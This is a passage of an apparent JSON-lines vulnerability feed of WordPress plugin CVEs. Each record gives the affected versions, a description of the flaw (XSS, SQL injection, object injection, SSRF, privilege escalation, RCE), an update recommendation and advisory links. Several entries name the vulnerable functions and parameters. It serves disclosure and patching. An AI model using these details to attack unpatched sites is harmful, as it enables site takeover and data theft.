https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3343408%40graphina-elementor-charts-and-graphs&new=3343408%40graphina-elementor-charts-and-graphs&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3343408%40graphina-elementor-charts-and-graphs&new=3343408%40graphina-elementor-charts-and-graphs&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ae7f76ef-3f97-4889-8902-f13a4a298475?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ae7f76ef-3f97-4889-8902-f13a4a298475?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3954","slug":"ditty-news-ticker","versionImpact":"3.1.38","versionEndExcluding":"3.1.39","description":"The Ditty plugin for WordPress is vulnerable to PHP Object Injection in all versions up to 3.1.38 via deserialization of untrusted input when adding a new ditty. This makes it possible for authenticated attackers, with contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"Update to version 3.1.39, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f00b138-5c4b-4f75-94b1-82721cba2668?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f00b138-5c4b-4f75-94b1-82721cba2668?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3081335%40ditty-news-ticker&new=3081335%40ditty-news-ticker&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3081335%40ditty-news-ticker&new=3081335%40ditty-news-ticker&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4423","slug":"wp-event-manager","versionImpact":"3.1.37.1","versionEndExcluding":"3.1.38","description":"The WP Event Manager \u2013 Events Calendar, Registrations, Sell Tickets with WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in versions up to, and including, 3.1.37.1  due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 3.1.38, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd9d22b0-a84a-4bf2-b8b4-89bae2970f29?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd9d22b0-a84a-4bf2-b8b4-89bae2970f29?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/Jacky-Y\\\/vuls\\\/blob\\\/main\\\/vul5.md\",\"name\":\"https:\\\/\\\/github.com\\\/Jacky-Y\\\/vuls\\\/blob\\\/main\\\/vul5.md\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2969034%40wp-event-manager%2Ftrunk&old=2953169%40wp-event-manager%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2969034%40wp-event-manager%2Ftrunk&old=2953169%40wp-event-manager%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wpeventmanager\\\/wp-event-manager\\\/issues\\\/1483\",\"name\":\"https:\\\/\\\/github.com\\\/wpeventmanager\\\/wp-event-manager\\\/issues\\\/1483\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3939","slug":"ditty-news-ticker","versionImpact":"3.1.35","versionEndExcluding":"3.1.36","description":"The Ditty  WordPress plugin before 3.1.36 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 3.1.36, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/80a9eb3a-2cb1-4844-9004-ba2554b2d46c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/80a9eb3a-2cb1-4844-9004-ba2554b2d46c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3201","slug":"shapepress-dsgvo","versionImpact":"3.1.32","versionEndExcluding":"3.1.33","description":"The WP DSGVO Tools (GDPR) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'pp_link' shortcode in all versions up to, and including, 3.1.32 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.1.33, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/df5cd6e7-e821-403f-a048-25c2ca1fb2de?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/df5cd6e7-e821-403f-a048-25c2ca1fb2de?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3090019%40shapepress-dsgvo%2Ftrunk&old=3016389%40shapepress-dsgvo%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3090019%40shapepress-dsgvo%2Ftrunk&old=3016389%40shapepress-dsgvo%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12302","slug":"icegram","versionImpact":"3.1.31","versionEndExcluding":"3.1.32","description":"The Icegram Engage  WordPress plugin before 3.1.32 does not sanitise and escape some of its Campaign settings, which could allow authors and above to perform Stored Cross-Site Scripting attacks","recommendation":"Update to version 3.1.32, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ed860dac-8c4a-482f-8826-31f1a894b6ce\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ed860dac-8c4a-482f-8826-31f1a894b6ce\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13486","slug":"icegram","versionImpact":"3.1.31","versionEndExcluding":"3.1.32","description":"The Icegram Engage  WordPress plugin before 3.1.32 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.1.32, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cbba8346-41f6-46ee-89ae-ed9524d768ef\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cbba8346-41f6-46ee-89ae-ed9524d768ef\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13482","slug":"icegram","versionImpact":"3.1.31","versionEndExcluding":"3.1.32","description":"The Icegram Engage  WordPress plugin before 3.1.32 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.1.32, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/83ae33d0-4fc1-4186-9d70-b854a16df3a7\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/83ae33d0-4fc1-4186-9d70-b854a16df3a7\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1406","slug":"jet-engine","versionEndExcluding":"3.1.3.1","description":"The JetEngine WordPress plugin before 3.1.3.1 includes uploaded files without adequately ensuring that they are not executable, leading to a remote code execution vulnerability.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2a81b6b1-2339-4889-9c28-1af133df8b65\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2a81b6b1-2339-4889-9c28-1af133df8b65\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3650","slug":"elementskit-lite","versionImpact":"3.1.2","versionEndExcluding":"3.1.3","description":"The ElementsKit Elementor addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Image Accordion widget in all versions 3.0.7 through 3.1.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93dcbab7-fdf5-4631-8605-77f8f190512d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93dcbab7-fdf5-4631-8605-77f8f190512d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3078160\\\/elementskit-lite\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3078160\\\/elementskit-lite\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2016-15041","slug":"mainwp","versionEndExcluding":"3.1.3","description":"The MainWP Dashboard \u2013 The Private WordPress Manager for Multiple Website Maintenance plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018mwp_setup_purchase_username\u2019 parameter in versions up to, and including, 3.1.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a9b1445f-3b6b-40fa-9a12-f55d63668dda?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a9b1445f-3b6b-40fa-9a12-f55d63668dda?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/klikki.fi\\\/adv\\\/mainwp.html\",\"name\":\"https:\\\/\\\/klikki.fi\\\/adv\\\/mainwp.html\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-mainwp-dashboard-cross-site-scripting-3-1-2\\\/\",\"name\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-mainwp-dashboard-cross-site-scripting-3-1-2\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/web.archive.org\\\/web\\\/20191101060009\\\/https%3A\\\/\\\/klikki.fi\\\/adv\\\/mainwp.html\",\"name\":\"https:\\\/\\\/web.archive.org\\\/web\\\/20191101060009\\\/https%3A\\\/\\\/klikki.fi\\\/adv\\\/mainwp.html\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-32629","slug":"wp-businessdirectory","versionImpact":"3.1.2","versionEndExcluding":"3.1.3","description":"Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in CMSJunkie - WordPress Business Directory Plugins WP-BusinessDirectory allows Path Traversal. This issue affects WP-BusinessDirectory: from n\/a through 3.1.2.","recommendation":"Update to version 3.1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-businessdirectory\\\/vulnerability\\\/wordpress-wp-businessdirectory-plugin-3-1-2-arbitrary-file-deletion-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-businessdirectory\\\/vulnerability\\\/wordpress-wp-businessdirectory-plugin-3-1-2-arbitrary-file-deletion-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-32630","slug":"wp-businessdirectory","versionImpact":"3.1.2","versionEndExcluding":"3.1.3","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CMSJunkie - WordPress Business Directory Plugins WP-BusinessDirectory allows Reflected XSS. This issue affects WP-BusinessDirectory: from n\/a through 3.1.2.","recommendation":"Update to version 3.1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-businessdirectory\\\/vulnerability\\\/wordpress-wp-businessdirectory-plugin-3-1-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-businessdirectory\\\/vulnerability\\\/wordpress-wp-businessdirectory-plugin-3-1-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3775","slug":"woolentor-addons","versionImpact":"3.1.2","versionEndExcluding":"3.1.3","description":"The ShopLentor \u2013 WooCommerce Builder for Elementor & Gutenberg +20 Modules \u2013 All in One Solution (formerly WooLentor) plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 3.1.2 via the woolentor_template_proxy function. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application, and can be used to query and modify information from internal services.","recommendation":"Update to version 3.1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woolentor-addons\\\/tags\\\/3.1.2\\\/includes\\\/admin-panel\\\/includes\\\/classes\\\/Admin.php#L71\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woolentor-addons\\\/tags\\\/3.1.2\\\/includes\\\/admin-panel\\\/includes\\\/classes\\\/Admin.php#L71\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4dfc28ec-1411-43c3-833e-a6c85a3ed767?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4dfc28ec-1411-43c3-833e-a6c85a3ed767?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2803","slug":"ultimate-addons-for-contact-form-7","versionEndExcluding":"3.1.29","description":"The Ultimate Addons for Contact Form 7 WordPress plugin before 3.1.29 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ec640d47-bb22-478d-9668-1dab72f12f8d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ec640d47-bb22-478d-9668-1dab72f12f8d\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2802","slug":"ultimate-addons-for-contact-form-7","versionEndExcluding":"3.1.29","description":"The Ultimate Addons for Contact Form 7 WordPress plugin before 3.1.29 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c5cc136a-2fa6-44ff-b5b5-26d367937df9\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c5cc136a-2fa6-44ff-b5b5-26d367937df9\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12023","slug":"full-customer","versionImpact":"3.1.25","versionEndExcluding":"3.1.26","description":"The FULL \u2013 Cliente plugin for WordPress is vulnerable to SQL Injection via the 'formId' parameter in all versions 3.1.5 to 3.1.25 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. This is only exploitable when the PRO version of the plugin is activated, along with Elementor Pro and  Elementor CRM.","recommendation":"Update to version 3.1.26, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/full-customer\\\/tags\\\/3.1.25\\\/app\\\/controller\\\/elementor-crm\\\/Hooks.php#L181\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/full-customer\\\/tags\\\/3.1.25\\\/app\\\/controller\\\/elementor-crm\\\/Hooks.php#L181\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/full-customer\\\/tags\\\/3.1.26\\\/app\\\/controller\\\/elementor-crm\\\/Hooks.php#L181\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/full-customer\\\/tags\\\/3.1.26\\\/app\\\/controller\\\/elementor-crm\\\/Hooks.php#L181\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86e990ae-6bfe-4f2b-8c37-b0675430a638?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86e990ae-6bfe-4f2b-8c37-b0675430a638?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4148","slug":"ditty-news-ticker","versionEndExcluding":"3.1.25","description":"The Ditty WordPress plugin before 3.1.25 does not sanitise and escape some parameters and generated URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/aa39de78-55b3-4237-84db-6fdf6820c58d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/aa39de78-55b3-4237-84db-6fdf6820c58d\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4358","slug":"shapepress-dsgvo","versionEndExcluding":"3.1.24","description":"The WP DSGVO Tools (GDPR) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via an unknown parameter in versions up to, and including, 3.1.23 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-wp-dsgvo-tools-gdpr-plugin-patched-vulnerability-actively-exploited\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-wp-dsgvo-tools-gdpr-plugin-patched-vulnerability-actively-exploited\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/support\\\/topic\\\/weiterleitung-redirects\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/support\\\/topic\\\/weiterleitung-redirects\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6c18ab1b-02f1-4679-8cff-679d98dc9f4a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6c18ab1b-02f1-4679-8cff-679d98dc9f4a?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9211","slug":"full-customer","versionImpact":"3.1.22","versionEndExcluding":"3.1.23","description":"The FULL \u2013 Cliente plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 3.1.22. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.1.23, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f62a486a-137b-48e5-b276-44438958e811?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f62a486a-137b-48e5-b276-44438958e811?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/full-customer\\\/tags\\\/3.1.22\\\/app\\\/views\\\/admin\\\/connection.php#L110\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/full-customer\\\/tags\\\/3.1.22\\\/app\\\/views\\\/admin\\\/connection.php#L110\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/full-customer\\\/tags\\\/3.1.22\\\/app\\\/views\\\/admin\\\/templates\\\/endpoints\\\/cloud.php#L7\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/full-customer\\\/tags\\\/3.1.22\\\/app\\\/views\\\/admin\\\/templates\\\/endpoints\\\/cloud.php#L7\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/full-customer\\\/tags\\\/3.1.22\\\/app\\\/views\\\/admin\\\/config.php#L274\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/full-customer\\\/tags\\\/3.1.22\\\/app\\\/views\\\/admin\\\/config.php#L274\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/full-customer\\\/tags\\\/3.1.23\\\/app\\\/views\\\/admin\\\/config.php#L274\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/full-customer\\\/tags\\\/3.1.23\\\/app\\\/views\\\/admin\\\/config.php#L274\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/full-customer\\\/tags\\\/3.1.23\\\/app\\\/views\\\/admin\\\/templates\\\/endpoints\\\/cloud.php#L7\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/full-customer\\\/tags\\\/3.1.23\\\/app\\\/views\\\/admin\\\/templates\\\/endpoints\\\/cloud.php#L7\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/full-customer\\\/tags\\\/3.1.23\\\/app\\\/views\\\/admin\\\/connection.php#L110\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/full-customer\\\/tags\\\/3.1.23\\\/app\\\/views\\\/admin\\\/connection.php#L110\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10589","slug":"leopard-wordpress-offload-media","versionImpact":"3.1.1","versionEndExcluding":"3.1.2","description":"The Leopard - WordPress Offload Media plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the import_settings() function in all versions up to, and including, 3.1.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.","recommendation":"Update to version 3.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c0b50597-18c1-4cbc-aebb-348f4d786ad9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c0b50597-18c1-4cbc-aebb-348f4d786ad9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/leopard-wordpress-offload-media\\\/23728788\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/leopard-wordpress-offload-media\\\/23728788\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3439","slug":"everest-forms","versionImpact":"3.1.1","versionEndExcluding":"3.1.2","description":"The Everest Forms \u2013 Contact Form, Quiz, Survey, Newsletter & Payment Form Builder for WordPress plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.1.1 via deserialization of untrusted input from the 'field_value' parameter. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present.","recommendation":"Update to version 3.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/everest-forms\\\/trunk\\\/includes\\\/admin\\\/views\\\/html-admin-page-entries-view.php#L147\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/everest-forms\\\/trunk\\\/includes\\\/admin\\\/views\\\/html-admin-page-entries-view.php#L147\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3268742\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3268742\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e5617a2-5670-4d98-a36b-942f71634642?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e5617a2-5670-4d98-a36b-942f71634642?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3422","slug":"everest-forms","versionImpact":"3.1.1","versionEndExcluding":"3.1.2","description":"The The Everest Forms \u2013 Contact Form, Quiz, Survey, Newsletter & Payment Form Builder for WordPress plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 3.1.1. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute arbitrary shortcodes.","recommendation":"Update to version 3.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3268742\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3268742\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3db1d9a0-ea68-4979-a36d-864c649f7aca?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3db1d9a0-ea68-4979-a36d-864c649f7aca?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3421","slug":"everest-forms","versionImpact":"3.1.1","versionEndExcluding":"3.1.2","description":"The Everest Forms \u2013 Contact Form, Quiz, Survey, Newsletter & Payment Form Builder for WordPress plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'form_id' parameter in all versions up to, and including, 3.1.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3268742\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3268742\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d55737a5-8aa5-4c26-bbb5-bbc5ea8be8d1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d55737a5-8aa5-4c26-bbb5-bbc5ea8be8d1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3245","slug":"chaty","versionEndExcluding":"3.1.2","description":"The Floating Chat Widget WordPress plugin before 3.1.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f9f8ae7e-6621-4e29-9257-b8306dbe8811\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f9f8ae7e-6621-4e29-9257-b8306dbe8811\",\"refsource\":\"MISC\",\"tags\":[]}]"}
